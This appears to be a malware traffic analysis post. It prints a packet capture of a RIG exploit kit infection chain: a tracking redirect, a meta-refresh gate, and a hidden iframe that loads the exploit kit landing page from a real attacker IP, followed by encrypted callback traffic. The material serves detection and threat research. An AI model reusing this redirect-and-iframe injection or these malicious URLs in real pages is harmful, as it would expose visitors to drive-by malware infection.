RIG Exploit Kit EK Delivers RAMNIT RAT Malware Backdoor Banking Trojan PCAP File Download Traffic Analysis

Download Attachments


Malwarebytes for Home | Anti-Malware Premium | Free Trial Download

 

2017-11-10 03:46:19.216224 IP 192.168.1.5.49186 > 18.195.19.123.80: Flags [P.], seq 1426946809:1426947166, ack 2995259417, win 16537, length 357: HTTP: GET /voluum/cebddddb-0f28-4087-99c3-690fa79f4804??track=48tmsGdksmgj383P=ad96939d842fae76905bea8a2c92a6dd HTTP/1.1
E…..@….,…….{.”.PU.z…..P.@..G..GET /voluum/cebddddb-0f28-4087-99c3-690fa79f4804??track=48tmsGdksmgj383P=ad96939d842fae76905bea8a2c92a6dd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: flinsheer-perreene.com
Connection: Keep-Alive

2017-11-10 03:46:19.630154 IP 18.195.19.123.80 > 192.168.1.5.49186: Flags [P.], seq 1:985, ack 357, win 55, length 984: HTTP: HTTP/1.1 200 OK
E…..@……..{…..P.”….U.|^P..7mR..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Nov 2017 08:46:25 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: cebddddb-0f28-4087-99c3-690fa79f4804-v4=cebddddb-0f28-4087-99c3-690fa79f4804;domain=flinsheer-perreene.com;path=/;HttpOnly
Set-Cookie: cc-v4=fdKd9Ppm4%2BiytNluXEyc%2B7WzdiZv86CuGn953Ih%2BcUORnlh%2FGtxIVL%2FxGHFZf52H%2Bg8y4tH%2BYhVgnD%2FQ7G167o3x65jJ0Wo15hD0wlA3APUh%2BavOtsYef0%2BEZ2qJn8ApbcdSu55QLICPhcoHfc2QaA%3D%3D;Max-Age=31536000;Expires=Sat, 10-Nov-2018 08:46:25 GMT;domain=flinsheer-perreene.com;path=/;HttpOnly

101
<html><head><meta http-equiv=”refresh” content=”0;URL=’http://kcsmj.redirectvoluum.com:80/redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D'” /></head><body></body></html>
0

2017-11-10 03:46:19.694090 IP 192.168.1.5.49186 > 18.195.19.123.80: Flags [P.], seq 357:837, ack 985, win 16291, length 480: HTTP: GET /favicon.ico HTTP/1.1
E…..@…
……..{.”.PU.|^….P.?..0..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: flinsheer-perreene.com
Connection: Keep-Alive
Cookie: cebddddb-0f28-4087-99c3-690fa79f4804-v4=cebddddb-0f28-4087-99c3-690fa79f4804; cc-v4=fdKd9Ppm4%2BiytNluXEyc%2B7WzdiZv86CuGn953Ih%2BcUORnlh%2FGtxIVL%2FxGHFZf52H%2Bg8y4tH%2BYhVgnD%2FQ7G167o3x65jJ0Wo15hD0wlA3APUh%2BavOtsYef0%2BEZ2qJn8ApbcdSu55QLICPhcoHfc2QaA%3D%3D

2017-11-10 03:46:19.958524 IP 18.195.19.123.80 > 192.168.1.5.49186: Flags [P.], seq 985:1416, ack 837, win 57, length 431: HTTP: HTTP/1.1 400 Bad Request
E…..@……..{…..P.”….U.~>P..9….HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 10 Nov 2017 08:46:26 GMT
Content-Type: text/html
Content-Length: 166
Connection: close

2017-11-10 03:46:20.871400 IP 192.168.1.5.49188 > 52.58.173.25.80: Flags [P.], seq 2132587277:2132587671, ack 1318172949, win 16537, length 394: HTTP: GET /redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D HTTP/1.1
E…..@…O…..4:…$.P….N…P.@…..GET /redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: kcsmj.redirectvoluum.com
Connection: Keep-Alive

2017-11-10 03:46:21.521409 IP 52.58.173.25.80 > 192.168.1.5.49188: Flags [P.], seq 1:407, ack 394, win 110, length 406: HTTP: HTTP/1.1 200 OK
E…Ld@…..4:…….P.$N…….P..n._..HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Content-Type: text/html;charset=UTF-8
Date: Fri, 10 Nov 2017 08:46:27 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Server: nginx
transfer-encoding: chunked
Connection: keep-alive

76
<html><head><meta http-equiv=”refresh” content=”0;URL=’http://194.58.40.193/test22.php'” /></head><body></body></html>

2017-11-10 03:46:21.936294 IP 192.168.1.5.49189 > 194.58.40.193.80: Flags [P.], seq 2594930462:2594930720, ack 3987607188, win 16537, length 258: HTTP: GET /test22.php HTTP/1.1
E..*..@…F……:(..%.P……..P.@.&…GET /test22.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 194.58.40.193
Connection: Keep-Alive

2017-11-10 03:46:22.643433 IP 194.58.40.193.80 > 192.168.1.5.49189: Flags [P.], seq 1:802, ack 258, win 245, length 801: HTTP: HTTP/1.1 200 OK
E..I..@.5….:(……P.%……. P…k…HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 10 Nov 2017 08:46:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

261
<HEAD>
</HEAD>

<BODY>

<iframe width=”500″ scrolling=”no” height=”500″ frameborder=”500″ src=”http://176.57.214.216/?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA==&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw==&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0″>
</body>
0

2017-11-10 03:46:22.963527 IP 192.168.1.5.49191 > 176.57.214.216.80: Flags [P.], seq 1277188482:1277189247, ack 4060390144, win 16537, length 765: HTTP: GET /?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA==&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw==&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0 HTTP/1.1
E..%..@……….9…’.PL Y…..P.@..h..GET /?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA==&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw==&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://194.58.40.193/test22.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 176.57.214.216
Connection: Keep-Alive

2017-11-10 03:46:24.969940 IP 192.168.1.5.49193 > 176.57.214.216.80: Flags [P.], seq 2174002867:2174003594, ack 3246818045, win 16537, length 727: HTTP: GET /?MTM1MTcw&AnzliBMWBYrRnbG9jYXRlZGZnTWVjeEVNU01nblg=YXR0YWNrcw==&xcdsfgdf=xXzQMvWZbRXQC53EKvjcT6NGMVHRHECL2YudmrHVefjaf1WkzrHFTF_3ozKASwSG6_FtdfJUDV&nLqQRXL=bG9jYXRlZA==&JHKaeJHCxkLKV=ZGVub21pbmF0aW9ucw==&caEDZffCL=Y2FwaXRhbA==&KwDWkGmaDeTI=c3Rvcm1lZA==&pYKNDKJoueWB=c3Rvcm1lZA==&MsrbrbOULyjg=Y2FwaXRhbA==&BBCFvkYfXqwZHxO=Y2FwaXRhbA==&HUPrrso=Y2FwaXRhbA==&vbnvbnd=C0jEWFLwRhmdxYB1gS9aurhkXVwEOd0pPU_xGLaQ9A-8GQFbRv3Qv9zrQkdMkmwheA61ENjO8e&NamupouUSuZ=cmVwb3J0&LKDlWMNIIc3Rvcm1lZA== HTTP/1.1
E…..@….y…..9…).P……..P.@…..GET /?MTM1MTcw&AnzliBMWBYrRnbG9jYXRlZGZnTWVjeEVNU01nblg=YXR0YWNrcw==&xcdsfgdf=xXzQMvWZbRXQC53EKvjcT6NGMVHRHECL2YudmrHVefjaf1WkzrHFTF_3ozKASwSG6_FtdfJUDV&nLqQRXL=bG9jYXRlZA==&JHKaeJHCxkLKV=ZGVub21pbmF0aW9ucw==&caEDZffCL=Y2FwaXRhbA==&KwDWkGmaDeTI=c3Rvcm1lZA==&pYKNDKJoueWB=c3Rvcm1lZA==&MsrbrbOULyjg=Y2FwaXRhbA==&BBCFvkYfXqwZHxO=Y2FwaXRhbA==&HUPrrso=Y2FwaXRhbA==&vbnvbnd=C0jEWFLwRhmdxYB1gS9aurhkXVwEOd0pPU_xGLaQ9A-8GQFbRv3Qv9zrQkdMkmwheA61ENjO8e&NamupouUSuZ=cmVwb3J0&LKDlWMNIIc3Rvcm1lZA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: 176.57.214.216

2017-11-10 03:50:08.148469 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 3308774346:3308774352, ack 778312377, win 16537, length 6
E…..@….W…..W…?…7…d..P.@.YQ….K…
2017-11-10 03:50:08.494157 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 6:81, ack 1, win 16537, length 75
E..s..@……….W…?…7…d..P.@……. ….gO.H.4e..w.qI…,i.F…A….)… ….`O.G.7a..(Ky….,?…\…\[.u.I
2017-11-10 03:50:09.165926 IP 194.87.145.189.443 > 192.168.1.5.49215: Flags [P.], seq 1:8, ack 81, win 457, length 7
E../rW@.6….W………?.d…7..P…………..
2017-11-10 03:50:09.166127 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 81:87, ack 8, win 16535, length 6

Leave a Reply